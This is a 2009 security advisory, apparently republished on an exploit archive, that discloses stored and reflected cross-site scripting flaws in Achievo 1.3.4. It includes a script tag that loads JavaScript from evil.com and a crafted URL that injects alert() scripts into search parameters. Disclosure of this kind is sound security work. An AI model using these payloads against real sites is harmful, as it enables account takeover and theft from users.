Skip to content
cyberexploits
webappphptext

Achievo 1.3.4 - Cross-Site Scripting

Achievo 1.3.4 - Cross-Site Scripting

Published on 2009-10-14

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/9863.txt7eac4c3a
raw
           Bonsai Information Security - Advisory

             http://www.bonsai-sec.com/research/



                   Multiple XSS in Achievo



1. *Advisory Information*



Title: Multiple XSS in Achievo

Advisory ID: BONSAI-2009-0101

Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt

Date published: 2009-10-13

Vendors contacted: Achievo

Release mode: Coordinated release





2. *Vulnerability Information*



Class: Multiple Cross Site Scripting (XSS)

Remotely Exploitable: Yes

Locally Exploitable: Yes

CVE Name: CVE-2009-2733





3. *Software Description*



Achievo is a flexible web-based resource management tool for business

environments. Achievo's resource management capabilities will enable

organizations to support their business processes in a simple, but effective

manner [0].





4. *Vulnerability Description*



Cross-Site Scripting attacks are a type of injection problem, in which

malicious scripts are injected into the otherwise benign and trusted web sites.

Cross-site scripting (XSS) attacks occur when an attacker uses a web

application to send malicious code, generally in the form of a browser side

script, to a different end user. Flaws that allow these attacks to succeed are

quite widespread and occur anywhere a web application uses input from a user

in the output it generates without validating or encoding it.



For additional information, please read [1].





5. *Vulnerable packages*



Version <= 1.3.4





6. *Non-vulnerable packages*



Achievo developers informed us that all users should upgrade to the latest

version of Achievo, which fixes this vulnerability. More information to be

found here:

    http://www.achievo.org/





7. *Credits*



This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).





8. *Technical Description*



8.1 A Persistent Cross Site Scripting vulnerability was found in the 'tittle'

variable within the scheduler module. This is because the application does not

properly sanitise the users input. The vulnerability can be triggered by a user

submitting the following data within the scheduler title:



    <SCRIPT SRC=//evil.com/xss.js></SCRIPT>



Which will include the xss.js javascript file within the schedule. A javascript

that exploits this issue and creates a new administrator user in the system can

be found in Bonsai's blog [2].



8.2 A Reflected Cross Site Scripting vulnerability was found in the

atksearch[contractnumber], atksearch_AE_customer[customer] and

atksearchmode[contracttype] variables within the 'Organisation Contracts'

administration page. This is because the application does not properly sanitise

the users input. The vulnerability can be triggered by clicking on the

following URL:



http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring



9. *Report Timeline*



    - 2009-07-09:

	Vulnerabilities were identified.



    - 2009-08-08:

    Vendor contacted.



    - 2009-08-12:

    Vendor confirmed vulnerabilities.



    - 2009-08-14:

    Vendor sets possible release date of fixed version to Monday 12 Oct.



    - 2009-10-12:

    Vendor released fixed version.



    - 2009-10-13:

    The advisory BONSAI-2009-0101 is published.





10. *References*



[0] http://www.achievo.org/

[1] http://www.owasp.org/index.php/Cross_site_scripting

[2] http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/



11. *About Bonsai*



Bonsai is a company involved in providing professional computer

information security services.

Currently a sound growth company, since its foundation in early 2009

in Buenos Aires, Argentina,

we are fully committed to quality service, and focused on our

customers' real needs.





12. *Disclaimer*



The contents of this advisory are copyright (c) 2009 Bonsai

Information Security, and may be

distributed freely provided that no fee is charged for this

distribution and proper credit is

given.
View on GitHub
Achievo 1.3.4 - Cross-Site Scripting · CyberExploits